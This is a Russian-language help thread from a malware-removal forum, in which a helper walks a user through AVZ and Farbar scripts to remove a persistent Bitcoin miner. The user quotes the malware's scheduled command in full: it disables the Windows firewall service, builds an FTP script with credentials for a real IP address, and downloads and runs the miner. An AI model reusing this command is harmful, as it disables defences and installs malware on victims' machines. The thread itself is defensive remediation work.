каждый раз Касперским обнаруживается неизвестный вирус [not-a-virus:RiskTool.Win32.BitCoinMiner.irbf, not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen
]
до этого вручную очищал планировщик и автозагрузку в реестре
скопировал строку с автозагрузки или с планировщика:
"c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 198.44.226.161> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get ppxkm.exe c:\RECYCLER\ppxkm.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&ppxkm.e"
логи autologger во вложении
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) PSI1, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
тело файла cmd.txt:
Скрытый текст
open 198.44.226.161
123
123
binary
get web7b.ini c:\RECYCLER\web7b.ini
byeСкрыть
входит в ftp://198.44.226.161 логином и паролем 123, 123
и там 2 файла вредоносной программы(есть подозрения, что это майнер криптовалют):
01/31/2018 02:10 422,912 ppxmsw.exe
01/21/2018 04:52 2,384,177 ppxwkc
Выполните скрипт в AVZ:Компьютер перезагрузится.Код:begin QuarantineFile('C:\hexppxkm.exe', ''); QuarantineFile('C:\Windows\system32\ccf.exe', ''); QuarantineFile('C:\Windows\system32\cmd.txt', ''); QuarantineFile('C:\Windows\System32\config\wshom.exe', ''); QuarantineFile('C:\Windows\system32\heilang.exe', ''); QuarantineFile('C:\Windows\system32\heilang1.exe', ''); QuarantineFile('C:\Windows\system32\hexppxkm.exe', ''); QuarantineFile('C:\Windows\system32\kengdiecs.exe', ''); QuarantineFile('C:\Windows\system32\logfile.txt', ''); QuarantineFile('C:\Windows\system32\nihao.exe', ''); QuarantineFile('C:\Windows\system32\p.exe', ''); QuarantineFile('C:\Windows\system32\ppxkm.exe', ''); DeleteFile('C:\hexppxkm.exe'); DeleteFile('C:\Windows\system32\ccf.exe'); DeleteFile('C:\Windows\system32\cmd.txt'); DeleteFile('C:\Windows\System32\config\wshom.exe', '32'); DeleteFile('C:\Windows\system32\heilang.exe'); DeleteFile('C:\Windows\system32\heilang1.exe'); DeleteFile('C:\Windows\system32\hexppxkm.exe'); DeleteFile('C:\Windows\system32\kengdiecs.exe'); DeleteFile('C:\Windows\system32\nihao.exe'); DeleteFile('C:\Windows\system32\p.exe'); DeleteFile('C:\Windows\system32\ppxkm.exe'); DeleteService('MinerService'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteRepair(9); ExecuteWizard('SCU', 2, 2, true); RebootWindows(false); end.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Сделайте новый лог Autologger.
Взломали вас, меняйте пароли, закрывайте уязвимости.
Выполните скрипт в AVZ при наличии доступа в интернет:После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.Код:var LogPath : string; ScriptPath : string; begin LogPath := GetAVZDirectory + 'log\avz_log.txt'; if FileExists(LogPath) Then DeleteFile(LogPath); ScriptPath := GetAVZDirectory +'ScanVuln.txt'; if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!'); exit; end; end; if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false) end.
WBR,
Vadim
Спасибо огромное, вложил коллекшнлог автологгера и загрузил карантин avz
интересно, но файлы wshom.exe, heilang.exe, ccf.exe, heilang1.exe ит.д все равно присутствуют в папке system32...
выполнил скрипт повторно, предварительно отключив Касперского, но эти файлы все равно там
Последний раз редактировалось PSI1; 05.02.2018 в 06:48.
Устраняйте критические уязвимости, иначе бесполезно удалять вирусы.Поиск критических уязвимостей
MS17-010: Обновления безопасности для Windows SMB Server
http://download.windowsupdate.com/d/...2d8c4e92b3.msu
Установите новый Internet Explorer
http://windows.microsoft.com/ru-ru/i...er/download-ie
Накопительное обновление системы безопасности для битов аннулирования ActiveX
http://www.microsoft.com/downloads/d...c-43c6dd6cb78e
Уязвимость в ядре Windows может допустить повышение уровня полномочий
http://www.microsoft.com/downloads/d...5-3fd5be147cf4
Уязвимость в MSXML делает возможным удаленное выполнение кода
http://www.microsoft.com/downloads/d...f-2f599fe6fdd9
Уязвимость общих элементов управления Windows делает возможным удаленное выполнение кода
http://www.microsoft.com/downloads/d...7-125e0e7320ae
Для установки этого обновления требуется установить SP3 для Microsoft Office 2007
http://www.microsoft.com/downloads/d...D-2A29D709F93F
Обновление для системы безопасности Microsoft Office Word 2007
http://www.microsoft.com/downloads/d...8-6ccfdfa399c5
Для установки этого обновления требуется установить SP3 для Microsoft Office 2007
http://www.microsoft.com/downloads/d...D-2A29D709F93F
Обновление для системы безопасности Microsoft Office Word 2003 Compatibility Pack
http://www.microsoft.com/downloads/d...0-4b18081bd536
Обнаружено уязвимостей: 8
Затем такой лог сделайте.
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
WBR,
Vadim
Устранил уязвимости, запустил скрипт avz, в итоге файлы(ccf,wshom,итд) после перезагрузки все равно присутствуют
скан FarBar во вложении
Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!Код:CreateRestorePoint: HKLM\...\Run: [360Safetray] => [X] HKLM\...\Run: [QQPCTray] => [X] HKLM\...\Run: [RavTRAY] => [X] HKLM\...\Run: [RISTRAY] => [X] HKLM\...\Run: [kxesc] => [X] HKLM\...\Run: [KVMON] => [X] HKLM\...\Run: [ShStatEXE] => [X] HKLM\...\Run: [McAfeeUpdaterUI] => [X] HKLM\...\Run: [KVXP] => [X] HKLM-x32\...\Run: [] => [X] HKLM\...\Command Processor: <==== ATTENTION 2018-02-01 15:09 - 2018-02-01 15:09 - 000698880 _____ C:\Windows\system32\config\wshom.exe 2018-02-01 13:10 - 2018-02-01 13:10 - 000424448 _____ C:\Windows\system32\ppxkm.exe 2018-02-01 10:18 - 2018-02-01 10:18 - 000424448 _____ C:\Windows\system32\hexppxkm.exe 2018-01-30 18:44 - 2010-11-21 12:24 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\heilang1.exe 2018-01-30 18:44 - 2010-11-21 12:24 - 000048128 _____ (Microsoft Corporation) C:\Windows\system32\ccf.exe 2018-01-30 18:44 - 2009-07-14 10:39 - 000055808 _____ (Microsoft Corporation) C:\Windows\system32\heilang.exe 2018-01-30 18:44 - 2009-07-14 10:39 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\nihao.exe 2018-01-30 18:44 - 2009-07-14 10:38 - 000031232 _____ (Microsoft Corporation) C:\Windows\system32\kengdiecs.exe Reboot:
Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
WBR,
Vadim
Премного благодарен, файлы больше не появляются.
Удалите папку C:\FRST со всем содержимым.
Выполните рекомендации после лечения.
Статистика проведенного лечения:
- Получено карантинов: 1
- Обработано файлов: 6
- В ходе лечения обнаружены вредоносные программы:
- c:\hexppxkm.exe - not-a-virus:RiskTool.Win32.BitCoinMiner.irbf
- c:\windows\system32\config\wshom.exe - not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen
- c:\windows\system32\hexppxkm.exe - not-a-virus:RiskTool.Win32.BitCoinMiner.irbf
- c:\windows\system32\ppxkm.exe - not-a-virus:RiskTool.Win32.BitCoinMiner.irbf
Уважаемый(ая) PSI1, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
Ваши права в разделе
